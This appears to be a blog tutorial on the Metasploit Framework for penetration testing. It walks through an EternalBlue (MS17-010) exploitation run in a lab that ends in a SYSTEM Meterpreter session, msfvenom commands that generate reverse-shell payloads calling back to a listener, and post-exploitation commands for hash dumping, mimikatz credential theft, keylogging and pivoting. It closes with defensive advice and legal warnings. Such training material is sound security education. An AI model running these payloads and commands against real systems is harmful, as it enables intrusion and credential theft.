Metasploit Framework — How to Use It for Penetration Testing thumbnail

Metasploit Framework — How to Use It for Penetration Testing

⏱ approx. 18 min views 287 likes 0 LOG_DATE:2026-05-09
TOC

Metasploit Framework is the open-source offensive framework that pentesters and red teamers worldwide use as a common language. From vulnerability validation to exploit execution, payload generation, and post-exploitation, the entire flow is driven from a single interface. This article is built around one goal: making you actually able to use the tool. Commands and hands-on practice are the focus.

01

What Metasploit is #

Metasploit Framework is an open-source offensive framework used for penetration testing and vulnerability validation. The core value is not "write an exploit from scratch every time" but the ability to invoke known exploits / payloads / post-modules from a unified interface.

Bundled by default in Kali Linux and Parrot OS, and a required practical skill in certifications like OSCP and CEH, it is the de facto "first offensive tool you ever touch".

▸ A one-line history

Started in 2003 by HD Moore in Perl → fully rewritten in Ruby in v3.0 (2007) → acquired by Rapid7 in 2009 and actively developed ever since.

What it can do #

  • Vulnerability scanning (auxiliary modules)
  • Exploitation of known CVEs (thousands of exploit modules)
  • Payload generation (msfvenom — exe / elf / php / shellcode and more)
  • Post-exploitation (info gathering, lateral movement, privilege escalation via Meterpreter)
  • Listener / handler (catching reverse connections)
02

Launch and database initialization #

On Kali it's preinstalled. Initialize the database once on first use and you unlock the result-management commands hosts / services / vulns later on.

Launch sequence
$ sudo msfdb init # start PostgreSQL + create DB (first time only) $ msfconsole # launch the interactive shell =[ metasploit v6.x.x-dev ] + -- --=[ 2300+ exploits - 1200+ auxiliary - 410+ post ] + -- --=[ 950+ payloads - 45+ encoders - 11+ nops ] msf6 > db_status [*] Connected to msf. Connection type: postgresql.
▸ The first three commands to memorize

help for the built-in command list, search to find modules, and use to select one. These three already cover most of what you need.

03

The basic workflow (five steps) #

Just about every Metasploit-driven attack fits into the same five-step shape.

1. Reconnaissance
nmap to enumerate open ports and service versions. db_nmap stores results directly in the msf database.
2. Module search
Use search to find an exploit matching the CVE or service.
3. Select + configure
use the module → show optionsset RHOSTS / LHOST / PAYLOAD.
4. Execute
check first to confirm the vulnerability is present, then exploit. Session acquired.
5. Post-exploitation
Use Meterpreter for info gathering, lateral movement, privilege escalation, and persistence.
04

The module hierarchy #

Every capability is packaged as a "module". They live in a tree under /usr/share/metasploit-framework/modules/.

TypeRoleRepresentative example
exploitAbuse a vulnerability to gain code executionexploit/windows/smb/ms17_010_eternalblue
auxiliaryHelpers — scanning, brute force, listenersauxiliary/scanner/portscan/tcp
payloadCode that runs on the target after a successful exploitwindows/x64/meterpreter/reverse_tcp
postPost-exploitation automation (recon / lateral / persistence)post/multi/recon/local_exploit_suggester
encoderTransform shellcode to evade static signaturesx86/shikata_ga_nai
evasionGenerate executables with AV-evasion built inwindows/windows_defender_exe

The three payload structures #

  • single (inline) — one self-contained binary. Big, but stable.
  • stager — a tiny stub that downloads the real payload over the network. Useful when the exploit has tight buffer constraints.
  • stage — the real payload that the stager loads. Meterpreter works through this mechanism.
05

Essential msfconsole commands #

The minimum set worth committing to memory. These cover roughly 95% of day-to-day usage.

Search / select / configure / execute
# search msf6 > search ms17_010 msf6 > search type:exploit platform:windows # module selection (the index from search results also works) msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > use 0 msf6 > back # go back one level # inspect msf6 > info msf6 > show options msf6 > show payloads msf6 > show targets # parameter setting msf6 > set RHOSTS 192.168.56.50 msf6 > set LHOST eth0 # interface name is accepted msf6 > setg LHOST 10.0.2.4 # global setting (applies to all modules) # execute msf6 > check # pre-flight the vulnerability msf6 > exploit msf6 > exploit -j -z # run in background msf6 > run # synonym for exploit
Session and job management
msf6 > sessions -l # list msf6 > sessions -i 1 # attach to ID=1 meterpreter > background # Ctrl+Z also works, returns to console msf6 > sessions -K # kill all sessions msf6 > jobs -l msf6 > jobs -K
Database integration (requires msfdb init)
msf6 > workspace -a redteam # create a workspace msf6 > db_nmap -sS 192.168.56.0/24 msf6 > hosts # discovered hosts msf6 > services # discovered services msf6 > vulns # candidate vulnerabilities msf6 > loot # collected files
06

Hands-on — EternalBlue (MS17-010) #

The SMB v1 vulnerability used by the 2017 WannaCry ransomware. Unpatched Windows 7 and Server 2008 R2 boxes are sitting ducks, making this a classic exercise — featured in HackTheBox Blue and the OSCP labs.

STEP 1 — Reconnaissance #

SMB detection with nmap
$ nmap -p 445 --script smb-vuln-ms17-010 192.168.56.50 PORT STATE SERVICE 445/tcp open microsoft-ds | smb-vuln-ms17-010: | VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

STEP 2 — Module search #

search inside msfconsole
msf6 > search ms17_010 Matching Modules # Name 0 exploit/windows/smb/ms17_010_eternalblue 1 exploit/windows/smb/ms17_010_psexec 2 auxiliary/scanner/smb/smb_ms17_010

STEP 3 — Configure + check #

Set parameters and pre-flight
msf6 > use 0 msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50 msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.106 msf6 exploit(ms17_010_eternalblue) > check [+] 192.168.56.50:445 - Host is likely VULNERABLE to MS17-010!

STEP 4 — Execute #

exploit → Meterpreter session
msf6 exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.56.106:4444 [*] 192.168.56.50:445 - ...exploitation successful... [*] Sending stage (200774 bytes) to 192.168.56.50 [*] Meterpreter session 1 opened meterpreter > getuid Server username: NT AUTHORITY\SYSTEM # SYSTEM in one shot meterpreter > sysinfo Computer : DC01 OS : Windows 7 (6.1 Build 7601, SP1) Architecture: x64
▸ Why EternalBlue hands you SYSTEM right away

The SMB service runs in the kernel (srv.sys). Since the exploit targets a vulnerability in the SMB driver itself, the shellcode runs with SYSTEM privileges from the very first instruction. Unlike userland exploits, there is no follow-up privilege-escalation step needed.

07

Payload generation with msfvenom #

A standalone payload-generation tool. Use it when you want to produce an exe / elf / php / shellcode locally and deliver it through another channel — file upload, email attachment, USB, and so on.

Key options #

  • -p <payload> — payload name
  • LHOST= / LPORT= — reverse-connection destination (use =, not set)
  • -f <format> — output format (exe / elf / raw / php / c, etc.)
  • -e <encoder> / -i <count> — encoder + number of iterations
  • -b '\x00\x0a\x0d' — exclude bad chars
  • -o <file> — output destination

Common combinations #

msfvenom samples
# Windows Meterpreter exe $ msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.56.106 LPORT=4444 \ -f exe -o shell.exe # Linux ELF $ msfvenom -p linux/x64/meterpreter/reverse_tcp \ LHOST=192.168.56.106 LPORT=4444 \ -f elf -o shell.elf # PHP web shell $ msfvenom -p php/meterpreter/reverse_tcp \ LHOST=192.168.56.106 LPORT=4444 \ -f raw -o shell.php # C shellcode (for BoF experiments, with bad chars excluded) $ msfvenom -p linux/x86/shell_reverse_tcp \ LHOST=192.168.56.106 LPORT=4444 \ -b '\x00\x0a\x0d' -f c

The receiver side — multi/handler #

To catch the reverse connection from a generated payload, stand up multi/handler.

Start the handler
msf6 > use exploit/multi/handler msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(handler) > set LHOST 192.168.56.106 msf6 exploit(handler) > set LPORT 4444 msf6 exploit(handler) > exploit -j # listen in background
▸ Encoders do not get you past AV

Encoders like shikata_ga_nai only defeat static signatures. Modern EDR catches binaries via behavioral analysis, sandboxing, and memory scanning, so anything msfvenom generates directly should be treated as "will be detected immediately".

08

Meterpreter #

Meterpreter is Metasploit's signature payload. It is memory-resident, uses encrypted communications, runs cross-platform, and supports dynamic module loading. Because it never drops a binary on disk it is harder for AV to see, and feature-wise it is in a different league from a raw reverse shell.

Frequently used commands #

Info gathering and privilege escalation
meterpreter > sysinfo # OS / architecture meterpreter > getuid # current user meterpreter > ps # process list # Windows privilege escalation meterpreter > getsystem # attempt elevation to SYSTEM meterpreter > hashdump # dump SAM hashes (requires SYSTEM) meterpreter > load kiwi # load mimikatz functionality meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
Files / processes / input monitoring
meterpreter > download /etc/shadow meterpreter > upload payload.exe C:\\Windows\\Temp\\ meterpreter > migrate 1234 # jump to another process (evasion / privilege change) meterpreter > screenshot # capture the screen meterpreter > keyscan_start # start keylogger meterpreter > keyscan_dump meterpreter > shell # spawn a native cmd / sh

Pivoting — into the internal network #

Using a compromised host as a stepping stone, you can route scans and exploits into internal IP segments that would otherwise be unreachable.

Add a route with autoroute
meterpreter > run autoroute -s 10.0.0.0/24 msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(tcp) > set RHOSTS 10.0.0.5 msf6 auxiliary(tcp) > run # scan 10.0.0.5 through the compromised host
09

The defender's perspective and ethics #

Metasploit is an offensive tool, but it is equally a validation tool for "does this actually work against my environment?". Required reading for blue teams too.

What the defender should do #

  • Don't sit on known CVEs — most Metasploit exploits target known CVEs, and patching kills most of them.
  • Keep EDR current — Meterpreter's reflective DLL injection is detectable by modern EDR.
  • Disable SMBv1 / LLMNR / NetBIOS — these are the breeding ground for EternalBlue and Responder-style attacks.
  • LAPS / JIT administration — block lateral movement that relies on reused passwords.
  • Centralize logs in SIEM — detect anomalous PowerShell, new processes, and unusual SMB access.
▸ Legal and ethical considerations

Running Metasploit against systems you don't own, without permission, is a crime. In Japan this falls under the Unauthorized Computer Access Act and the Penal Code (obstruction of business by damaging electronic computers).

Use is limited to:

  • Environments you own (home LAN / self-built VMs / HackTheBox / VulnHub)
  • Penetration tests with written authorization (a signed contract with the client)
  • CTFs (only where the organizer has explicitly authorized attacks)

"I just want to try a PoC", "on my friend's server", "on a coworker's PC" — all unacceptable.

Summary #

  • Metasploit moves in five steps: discover → select → configure → execute → post
  • The main UI is msfconsole, standalone payloads come from msfvenom, results are managed by msfdb
  • Meterpreter is a memory-resident stealth shell; migrate / hashdump / autoroute are the post-exploitation workhorses
  • In the EDR era, assume raw msfvenom output gets detected; serious evasion is the domain of other frameworks (Sliver, Cobalt Strike, etc.)
  • Use it only on authorized environments — if you can't honor that rule, don't touch it
𝕏 Post B! Hatena